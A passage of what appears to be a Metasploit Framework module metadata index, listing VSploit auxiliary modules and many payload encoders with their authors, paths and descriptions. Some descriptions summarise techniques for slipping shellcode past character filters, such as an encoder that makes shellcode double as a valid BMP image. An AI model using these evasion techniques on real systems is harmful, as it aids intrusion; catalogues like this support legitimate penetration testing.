"MJC"
],
"description": "This module queries known Zeus Botnet DNS records.",
"references": [
"URL-https://zeustracker.abuse.ch/blocklist.php?download=domainblocklist"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb",
"is_install_path": true,
"ref_name": "vsploit/malware/dns/dns_zeus",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_vsploit/pii/email_pii": {
"name": "VSploit Email PII",
"full_name": "auxiliary/vsploit/pii/email_pii",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"willis"
],
"description": "This auxiliary reads from a file and sends data which\n should be flagged via an internal or external SMTP server.",
"references": [
],
"platform": "",
"arch": "",
"rport": "25",
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/vsploit/pii/email_pii.rb",
"is_install_path": true,
"ref_name": "vsploit/pii/email_pii",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_vsploit/pii/web_pii": {
"name": "VSploit Web PII",
"full_name": "auxiliary/vsploit/pii/web_pii",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MJC"
],
"description": "This module emulates a webserver leaking PII data",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2011/06/02/vsploit--virtualizing-exploitation-attributes-with-metasploit-framework"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/vsploit/pii/web_pii.rb",
"is_install_path": true,
"ref_name": "vsploit/pii/web_pii",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_cmd/brace": {
"name": "Bash Brace Expansion Command Encoder",
"full_name": "encoder/cmd/brace",
"rank": 100,
"disclosure_date": null,
"type": "encoder",
"author": [
"wvu <wvu@metasploit.com>",
"egypt <egypt@metasploit.com>"
],
"description": "This encoder uses brace expansion in Bash and other shells\n to avoid whitespace without being overly fancy.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-23 15:20:56 +0000",
"path": "/modules/encoders/cmd/brace.rb",
"is_install_path": true,
"ref_name": "cmd/brace",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_cmd/echo": {
"name": "Echo Command Encoder",
"full_name": "encoder/cmd/echo",
"rank": 400,
"disclosure_date": null,
"type": "encoder",
"author": [
"hdm <x@hdm.io>"
],
"description": "This encoder uses echo and backlash escapes to avoid commonly restricted characters.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/cmd/echo.rb",
"is_install_path": true,
"ref_name": "cmd/echo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_cmd/generic_sh": {
"name": "Generic Shell Variable Substitution Command Encoder",
"full_name": "encoder/cmd/generic_sh",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"hdm <x@hdm.io>"
],
"description": "This encoder uses standard Bourne shell variable substitution\n tricks to avoid commonly restricted characters.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/cmd/generic_sh.rb",
"is_install_path": true,
"ref_name": "cmd/generic_sh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_cmd/ifs": {
"name": "Bourne ${IFS} Substitution Command Encoder",
"full_name": "encoder/cmd/ifs",
"rank": 100,
"disclosure_date": null,
"type": "encoder",
"author": [
"egypt <egypt@metasploit.com>",
"wvu <wvu@metasploit.com>"
],
"description": "This encoder uses Bourne ${IFS} substitution to avoid whitespace\n without being overly fancy.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-23 15:20:38 +0000",
"path": "/modules/encoders/cmd/ifs.rb",
"is_install_path": true,
"ref_name": "cmd/ifs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_cmd/perl": {
"name": "Perl Command Encoder",
"full_name": "encoder/cmd/perl",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"hdm <x@hdm.io>"
],
"description": "This encoder uses perl to avoid commonly restricted characters.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/cmd/perl.rb",
"is_install_path": true,
"ref_name": "cmd/perl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_cmd/powershell_base64": {
"name": "Powershell Base64 Command Encoder",
"full_name": "encoder/cmd/powershell_base64",
"rank": 600,
"disclosure_date": null,
"type": "encoder",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This encodes the command as a base64 encoded command for powershell.",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/cmd/powershell_base64.rb",
"is_install_path": true,
"ref_name": "cmd/powershell_base64",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_cmd/printf_php_mq": {
"name": "printf(1) via PHP magic_quotes Utility Command Encoder",
"full_name": "encoder/cmd/printf_php_mq",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This encoder uses the printf(1) utility to avoid restricted\n characters. Some shell variable substitution may also be used\n if needed symbols are blacklisted. Some characters are intentionally\n left unescaped since it is assumed that PHP with magic_quotes_gpc\n enabled will escape them during request handling.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/encoders/cmd/printf_php_mq.rb",
"is_install_path": true,
"ref_name": "cmd/printf_php_mq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_generic/eicar": {
"name": "The EICAR Encoder",
"full_name": "encoder/generic/eicar",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This encoder merely replaces the given payload with the EICAR test string.\n Note, this is sure to ruin your payload.\n\n Any content-aware firewall, proxy, IDS, or IPS that follows anti-virus\n standards should alert and do what it would normally do when malware is\n transmitted across the wire.",
"references": [
],
"platform": "All",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/generic/eicar.rb",
"is_install_path": true,
"ref_name": "generic/eicar",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_generic/none": {
"name": "The \"none\" Encoder",
"full_name": "encoder/generic/none",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This \"encoder\" does not transform the payload in any way.",
"references": [
],
"platform": "All",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/generic/none.rb",
"is_install_path": true,
"ref_name": "generic/none",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_mipsbe/byte_xori": {
"name": "Byte XORi Encoder",
"full_name": "encoder/mipsbe/byte_xori",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"Julien Tinnes <julien@cr0.org>",
"juan vazquez <juan.vazquez@metasploit.com>",
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Mips Web server exploit friendly xor encoder. This encoder has been found useful on\n situations where '&' (0x26) is a badchar. Since 0x26 is the xor's opcode on MIPS\n architectures, this one is based on the xori instruction.",
"references": [
],
"platform": "All",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-18 16:33:44 +0000",
"path": "/modules/encoders/mipsbe/byte_xori.rb",
"is_install_path": true,
"ref_name": "mipsbe/byte_xori",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_mipsbe/longxor": {
"name": "XOR Encoder",
"full_name": "encoder/mipsbe/longxor",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"Julien Tinnes <julien@cr0.org>",
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Mips Web server exploit friendly xor encoder",
"references": [
],
"platform": "All",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-18 13:35:16 +0000",
"path": "/modules/encoders/mipsbe/longxor.rb",
"is_install_path": true,
"ref_name": "mipsbe/longxor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_mipsle/byte_xori": {
"name": "Byte XORi Encoder",
"full_name": "encoder/mipsle/byte_xori",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"Julien Tinnes <julien@cr0.org>",
"juan vazquez <juan.vazquez@metasploit.com>",
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Mips Web server exploit friendly xor encoder. This encoder has been found useful on\n situations where '&' (0x26) is a badchar. Since 0x26 is the xor's opcode on MIPS\n architectures, this one is based on the xori instruction.",
"references": [
],
"platform": "All",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-18 16:30:47 +0000",
"path": "/modules/encoders/mipsle/byte_xori.rb",
"is_install_path": true,
"ref_name": "mipsle/byte_xori",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_mipsle/longxor": {
"name": "XOR Encoder",
"full_name": "encoder/mipsle/longxor",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"Julien Tinnes <julien@cr0.org>",
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Mips Web server exploit friendly xor encoder",
"references": [
],
"platform": "All",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-18 15:48:29 +0000",
"path": "/modules/encoders/mipsle/longxor.rb",
"is_install_path": true,
"ref_name": "mipsle/longxor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_php/base64": {
"name": "PHP Base64 Encoder",
"full_name": "encoder/php/base64",
"rank": 500,
"disclosure_date": null,
"type": "encoder",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "This encoder returns a base64 string encapsulated in\n eval(base64_decode()), increasing the size by a bit more than\n one third.",
"references": [
],
"platform": "All",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-07-12 17:59:12 +0000",
"path": "/modules/encoders/php/base64.rb",
"is_install_path": true,
"ref_name": "php/base64",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_ppc/longxor": {
"name": "PPC LongXOR Encoder",
"full_name": "encoder/ppc/longxor",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This encoder is ghandi's PPC dword xor encoder with some size tweaks\n by HDM.",
"references": [
],
"platform": "All",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/ppc/longxor.rb",
"is_install_path": true,
"ref_name": "ppc/longxor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_ppc/longxor_tag": {
"name": "PPC LongXOR Encoder",
"full_name": "encoder/ppc/longxor_tag",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This encoder is ghandi's PPC dword xor encoder but uses a tag-based\n terminator rather than a length.",
"references": [
],
"platform": "All",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/ppc/longxor_tag.rb",
"is_install_path": true,
"ref_name": "ppc/longxor_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_ruby/base64": {
"name": "Ruby Base64 Encoder",
"full_name": "encoder/ruby/base64",
"rank": 500,
"disclosure_date": null,
"type": "encoder",
"author": [
"Robin Stenvi <robin.stenvi@gmail.com>"
],
"description": "This encoder returns a base64 string encapsulated in\n eval(%(base64 encoded string).unpack(%(m0)).first).",
"references": [
],
"platform": "All",
"arch": "ruby",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-04-24 18:33:27 +0000",
"path": "/modules/encoders/ruby/base64.rb",
"is_install_path": true,
"ref_name": "ruby/base64",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_sparc/longxor_tag": {
"name": "SPARC DWORD XOR Encoder",
"full_name": "encoder/sparc/longxor_tag",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"optyx <optyx@no$email.com>",
"hdm <x@hdm.io>"
],
"description": "This encoder is optyx's 48-byte SPARC encoder with some tweaks.",
"references": [
],
"platform": "All",
"arch": "sparc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/sparc/longxor_tag.rb",
"is_install_path": true,
"ref_name": "sparc/longxor_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x64/xor": {
"name": "XOR Encoder",
"full_name": "encoder/x64/xor",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "An x64 XOR encoder. Uses an 8 byte key and takes advantage of x64 relative addressing.",
"references": [
],
"platform": "All",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x64/xor.rb",
"is_install_path": true,
"ref_name": "x64/xor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x64/xor_dynamic": {
"name": "Dynamic key XOR Encoder",
"full_name": "encoder/x64/xor_dynamic",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"lupman",
"phra"
],
"description": "An x64 XOR encoder with dynamic key size",
"references": [
],
"platform": "All",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-15 01:02:13 +0000",
"path": "/modules/encoders/x64/xor_dynamic.rb",
"is_install_path": true,
"ref_name": "x64/xor_dynamic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x64/zutto_dekiru": {
"name": "Zutto Dekiru",
"full_name": "encoder/x64/zutto_dekiru",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"agix"
],
"description": "Inspired by shikata_ga_nai using fxsave64 to work under x64 systems.",
"references": [
],
"platform": "All",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x64/zutto_dekiru.rb",
"is_install_path": true,
"ref_name": "x64/zutto_dekiru",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/add_sub": {
"name": "Add/Sub Encoder",
"full_name": "encoder/x86/add_sub",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"Melih Sarica <ms@sevure.com>"
],
"description": "Encodes payload with add or sub instructions. This idea came\n from (offensive-security) muts' hp nnm 7.5.1 exploit.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/add_sub.rb",
"is_install_path": true,
"ref_name": "x86/add_sub",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/alpha_mixed": {
"name": "Alpha2 Alphanumeric Mixedcase Encoder",
"full_name": "encoder/x86/alpha_mixed",
"rank": 100,
"disclosure_date": null,
"type": "encoder",
"author": [
"pusscat <pusscat@metasploit.com>",
"skylined <skylined@edup.tudelft.nl>"
],
"description": "Encodes payloads as alphanumeric mixedcase text. This encoder uses\n SkyLined's Alpha2 encoding suite.\n A pure alpha encoder is impossible without having a register that points at or near the shellcode.\n In a default configuration the first few bytes at the beginning are an fnstenv getpc stub (the same as used in shikata_ga_nai) and thus are not alphanumeric.\n You can set BufferRegister for full alpha (see Encoder options for details).",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/alpha_mixed.rb",
"is_install_path": true,
"ref_name": "x86/alpha_mixed",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/alpha_upper": {
"name": "Alpha2 Alphanumeric Uppercase Encoder",
"full_name": "encoder/x86/alpha_upper",
"rank": 100,
"disclosure_date": null,
"type": "encoder",
"author": [
"pusscat <pusscat@metasploit.com>",
"skylined <skylined@edup.tudelft.nl>"
],
"description": "Encodes payloads as alphanumeric uppercase text. This encoder uses\n SkyLined's Alpha2 encoding suite.\n A pure alpha encoder is impossible without having a register that points at or near the shellcode.\n In a default configuration the first few bytes at the beginning are an fnstenv getpc stub (the same as used in shikata_ga_nai) and thus are not alphanumeric.\n You can set BufferRegister for full alpha (see Encoder options for details).",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/alpha_upper.rb",
"is_install_path": true,
"ref_name": "x86/alpha_upper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/avoid_underscore_tolower": {
"name": "Avoid underscore/tolower",
"full_name": "encoder/x86/avoid_underscore_tolower",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"skape <mmiller@hick.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Underscore/tolower Safe Encoder used to exploit CVE-2012-2329. It is a\n modified version of the 'Avoid UTF8/tolower' encoder by skape. Please check\n the documentation of the skape encoder before using it. As the original,\n this encoder expects ECX pointing to the start of the encoded payload. Also\n BufferOffset must be provided if needed.\n\n The changes introduced are (1) avoid the use of the 0x5f byte (underscore) in\n because it is a badchar in the CVE-2012-2329 case and (2) optimize the\n transformation block, having into account more relaxed conditions about bad\n characters greater than 0x80.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/avoid_underscore_tolower.rb",
"is_install_path": true,
"ref_name": "x86/avoid_underscore_tolower",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/avoid_utf8_tolower": {
"name": "Avoid UTF8/tolower",
"full_name": "encoder/x86/avoid_utf8_tolower",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"skape <mmiller@hick.org>"
],
"description": "UTF8 Safe, tolower Safe Encoder",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/avoid_utf8_tolower.rb",
"is_install_path": true,
"ref_name": "x86/avoid_utf8_tolower",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/bloxor": {
"name": "BloXor - A Metamorphic Block Based XOR Encoder",
"full_name": "encoder/x86/bloxor",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "A Metamorphic Block Based XOR Encoder.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/bloxor.rb",
"is_install_path": true,
"ref_name": "x86/bloxor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/bmp_polyglot": {
"name": "BMP Polyglot",
"full_name": "encoder/x86/bmp_polyglot",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"Spencer McIntyre"
],
"description": "Encodes a payload in such a way that the resulting binary blob is both\n valid x86 shellcode and a valid bitmap image file (.bmp). The selected\n bitmap file to inject into must use the BM (Windows 3.1x/95/NT) header\n and the 40-byte Windows 3.1x/NT BITMAPINFOHEADER. Additionally the file\n must use either 24 or 32 bits per pixel as the color depth and no\n compression. This encoder makes absolutely no effort to remove any\n invalid characters.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/bmp_polyglot.rb",
"is_install_path": true,
"ref_name": "x86/bmp_polyglot",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/call4_dword_xor": {
"name": "Call+4 Dword XOR Encoder",
"full_name": "encoder/x86/call4_dword_xor",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"hdm <x@hdm.io>",
"spoonm <spoonm@no$email.com>"
],
"description": "Call+4 Dword XOR Encoder",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/call4_dword_xor.rb",
"is_install_path": true,
"ref_name": "x86/call4_dword_xor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/context_cpuid": {
"name": "CPUID-based Context Keyed Payload Encoder",
"full_name": "encoder/x86/context_cpuid",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"Dimitris Glynos"
],
"description": "This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/context_cpuid.rb",
"is_install_path": true,
"ref_name": "x86/context_cpuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/context_stat": {
"name": "stat(2)-based Context Keyed Payload Encoder",
"full_name": "encoder/x86/context_stat",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"Dimitris Glynos"
],
"description": "This is a Context-Keyed Payload Encoder based on stat(2)\n and Shikata Ga Nai.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/context_stat.rb",
"is_install_path": true,
"ref_name": "x86/context_stat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/context_time": {
"name": "time(2)-based Context Keyed Payload Encoder",
"full_name": "encoder/x86/context_time",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"Dimitris Glynos"
],
"description": "This is a Context-Keyed Payload Encoder based on time(2)\n and Shikata Ga Nai.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/context_time.rb",
"is_install_path": true,
"ref_name": "x86/context_time",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/countdown": {
"name": "Single-byte XOR Countdown Encoder",
"full_name": "encoder/x86/countdown",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "This encoder uses the length of the payload as a position-dependent\n encoder key to produce a small decoder stub.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-09-01 02:40:26 +0000",
"path": "/modules/encoders/x86/countdown.rb",
"is_install_path": true,
"ref_name": "x86/countdown",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/fnstenv_mov": {
"name": "Variable-length Fnstenv/mov Dword XOR Encoder",
"full_name": "encoder/x86/fnstenv_mov",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This encoder uses a variable-length mov equivalent instruction\n with fnstenv for getip.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/fnstenv_mov.rb",
"is_install_path": true,
"ref_name": "x86/fnstenv_mov",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/jmp_call_additive": {
"name": "Jump/Call XOR Additive Feedback Encoder",
"full_name": "encoder/x86/jmp_call_additive",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Jump/Call XOR Additive Feedback",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/jmp_call_additive.rb",
"is_install_path": true,
"ref_name": "x86/jmp_call_additive",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/nonalpha": {
"name": "Non-Alpha Encoder",
"full_name": "encoder/x86/nonalpha",
"rank": 100,
"disclosure_date": null,
"type": "encoder",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "Encodes payloads as non-alpha based bytes. This allows\n payloads to bypass both toupper() and tolower() calls,\n but will fail isalpha(). Table based design from\n Russel Sanford.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-30 01:22:24 +0000",
"path": "/modules/encoders/x86/nonalpha.rb",
"is_install_path": true,
"ref_name": "x86/nonalpha",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/nonupper": {
"name": "Non-Upper Encoder",
"full_name": "encoder/x86/nonupper",
"rank": 100,
"disclosure_date": null,
"type": "encoder",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "Encodes payloads as non-alpha based bytes. This allows\n payloads to bypass tolower() calls, but will fail isalpha().\n Table based design from Russel Sanford.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/nonupper.rb",
"is_install_path": true,
"ref_name": "x86/nonupper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/opt_sub": {
"name": "Sub Encoder (optimised)",
"full_name": "encoder/x86/opt_sub",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"OJ Reeves <oj@buffered.io>"
],
"description": "Encodes a payload using a series of SUB instructions and writing the\n encoded value to ESP. This concept is based on the known SUB encoding\n approach that is widely used to manually encode payloads with very\n restricted allowed character sets. It will not reset EAX to zero unless\n absolutely necessary, which helps reduce the payload by 10 bytes for\n every 4-byte chunk. ADD support hasn't been included as the SUB\n instruction is more likely to avoid bad characters anyway.\n\n The payload requires a base register to work off which gives the start\n location of the encoder payload in memory. If not specified, it defaults\n to ESP. If the given register doesn't point exactly to the start of the\n payload then an offset value is also required.\n\n Note: Due to the fact that many payloads use the FSTENV approach to\n get the current location in memory there is an option to protect the\n start of the payload by setting the 'OverwriteProtect' flag to true.\n This adds 3-bytes to the start of the payload to bump ESP by 32 bytes\n so that it's clear of the top of the payload.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/opt_sub.rb",
"is_install_path": true,
"ref_name": "x86/opt_sub",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/service": {
"name": "Register Service",
"full_name": "encoder/x86/service",
"rank": 0,
